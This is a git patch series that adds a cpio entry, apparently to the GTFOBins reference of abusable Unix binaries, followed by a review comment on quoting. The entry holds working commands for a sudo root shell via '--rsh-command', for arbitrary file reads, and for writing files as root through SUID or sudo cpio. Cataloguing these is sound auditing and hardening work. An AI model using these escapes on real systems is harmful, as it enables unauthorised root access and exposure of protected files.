From 6f2c00168730c40cc3658761b3dba9d3037d4008 Mon Sep 17 00:00:00 2001
From: kiranghimire
Date: Sat, 6 Mar 2021 21:51:42 +0545
Subject: [PATCH 1/2] Added cpio
---
 _gtfobins/cpio.yml | 38 ++++++++++++++++++++++++++++++++++++++
 1 file changed, 38 insertions(+)
 create mode 100644 _gtfobins/cpio.yml
diff --git a/_gtfobins/cpio.yml b/_gtfobins/cpio.yml
new file mode 100644
index 0000000..ce84476
--- /dev/null
+++ b/_gtfobins/cpio.yml
@@ -0,0 +1,38 @@
+---
+description: This reads the contents of file or overwrite to or from the subjected place.
+functions:
+ file-read:
+ - code: |
+ LFILE=file_to_read_or_to_save
+ LFOLDER=folder_location_to_read_or_to_save
+ touch file.txt
+ FOLDER=folder_where_file.txt_is_saved
+ echo $LFILE > /$FOLDER/file.txt
+ cd /$LFOLDER && cpio -o < /$FOLDER/file.txt
+ suid:
+ - code: |
+ LFILE=file_to_read_or_to_save
+ LFOLDER=folder_location_to_read_or_to_save
+ touch file.txt
+ FOLDER=folder_where_file.txt_is_saved
+ echo $LFILE > /$FOLDER/file.txt
+ cd /$LFOLDER && cpio -o < /$FOLDER/file.txt
+
+ # FILE to overwrite
+ cpio -p /$DFOLDER/ < /$FOLDER/file.txt
+ sudo:
+ - code: |
+ LFILE=file_to_read_or_to_save
+ LFOLDER=folder_location_to_read_or_to_save
+ touch file.txt
+ FOLDER=folder_where_file.txt_is_saved
+ echo $LFILE > /$FOLDER/file.txt
+ cd /$LFOLDER && cpio -o < /$FOLDER/file.txt
+
+ # FILE to overwrite
+ cpio -p /$DFOLDER/ < /$FOLDER/file.txt
+---
+
+
+
+
From d63982dea98046c3adaae7eb7fc524f185491922 Mon Sep 17 00:00:00 2001
From: Andrea Cardaci
Date: Sun, 7 Mar 2021 12:24:02 +0100
Subject: [PATCH 2/2] Simplify and add file-write and shell
---
 _gtfobins/cpio.yml | 78 ++++++++++++++++++++++------------------
 1 file changed, 47 insertions(+), 31 deletions(-)
diff --git a/_gtfobins/cpio.yml b/_gtfobins/cpio.yml
index ce84476..7828004 100644
--- a/_gtfobins/cpio.yml
+++ b/_gtfobins/cpio.yml
@@ -1,38 +1,54 @@
 ---
-description: This reads the contents of file or overwrite to or from the subjected place.
 functions:
+ shell:
+ - code: |
+ echo '/bin/sh /dev/tty' >localhost
+ cpio -o --rsh-command /bin/sh -F localhost:
 file-read:
- - code: |
- LFILE=file_to_read_or_to_save
- LFOLDER=folder_location_to_read_or_to_save
- touch file.txt
- FOLDER=folder_where_file.txt_is_saved
- echo $LFILE > /$FOLDER/file.txt
- cd /$LFOLDER && cpio -o < /$FOLDER/file.txt
+ - description: The content of the file is printed to standard output, between the cpio archive format header and footer.
+ code: |
+ LFILE=file_to_read
+ echo "$LFILE" | cpio -o
+ - description: The whole directory structure is copied to `$TF`.
+ code: |
+ LFILE=file_to_read
+ TF=$(mktemp -d)
+ echo "$LFILE" | cpio -dp $TF
+ cat "$TF/$LFILE"
+ file-write:
+ - description: Copies `$LFILE` to the `$LDIR` directory.
+ code: |
+ LFILE=file_to_write
+ LDIR=where_to_write
+ echo DATA >$LFILE
+ echo $LFILE | cpio -up $LDIR
 suid:
- - code: |
- LFILE=file_to_read_or_to_save
- LFOLDER=folder_location_to_read_or_to_save
- touch file.txt
- FOLDER=folder_where_file.txt_is_saved
- echo $LFILE > /$FOLDER/file.txt
- cd /$LFOLDER && cpio -o < /$FOLDER/file.txt
-
- # FILE to overwrite
- cpio -p /$DFOLDER/ < /$FOLDER/file.txt
+ - description: The whole directory structure is copied to `$TF`.
+ code: |
+ LFILE=file_to_read
+ TF=$(mktemp -d)
+ echo "$LFILE" | ./cpio -R $UID -dp $TF
+ cat "$TF/$LFILE"
+ - description: Copies `$LFILE` to the `$LDIR` directory.
+ code: |
+ LFILE=file_to_write
+ LDIR=where_to_write
+ echo DATA >$LFILE
+ echo $LFILE | ./cpio -R 0:0 -p $LDIR
 sudo:
 - code: |
- LFILE=file_to_read_or_to_save
- LFOLDER=folder_location_to_read_or_to_save
- touch file.txt
- FOLDER=folder_where_file.txt_is_saved
- echo $LFILE > /$FOLDER/file.txt
- cd /$LFOLDER && cpio -o < /$FOLDER/file.txt
-
- # FILE to overwrite
- cpio -p /$DFOLDER/ < /$FOLDER/file.txt
+ echo '/bin/sh /dev/tty' >localhost
+ sudo cpio -o --rsh-command /bin/sh -F localhost:
+ - description: The whole directory structure is copied to `$TF`.
+ code: |
+ LFILE=file_to_read
+ TF=$(mktemp -d)
+ echo "$LFILE" | sudo cpio -R $UID -dp $TF
+ cat "$TF/$LFILE"
+ - description: Copies `$LFILE` to the `$LDIR` directory.
+ code: |
+ LFILE=file_to_write
+ LDIR=where_to_write
+ echo DATA >$LFILE
+ echo $LFILE | sudo cpio -R 0:0 -p $LDIR
 ---
-
-
-
-
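Review bot: Variable quoting is inconsistent across the new snippets: the file-read examples quote `"$LFILE"`, but the three file-write examples use `echo DATA >$LFILE` and `echo $LFILE | cpio -up $LDIR` (likewise the `./cpio -R 0:0 -p $LDIR` and `sudo cpio -R 0:0 -p $LDIR` variants), and `$TF` is unquoted in all three `-dp $TF` lines. A path containing whitespace or glob characters is word-split, so the snippet would act on a different path than the one the description documents; quoting every expansion, e.g. `echo "$LFILE" | cpio -up "$LDIR"`, keeps the examples uniform. Separately, the `shell` entry and the first `sudo` entry are the only ones without a `description`; a sentence noting that `--rsh-command` selects the program cpio runs for the remote-style archive name given to `-F` would tell someone auditing sudoers rules or SUID binaries why cpio needs the same scrutiny as a shell.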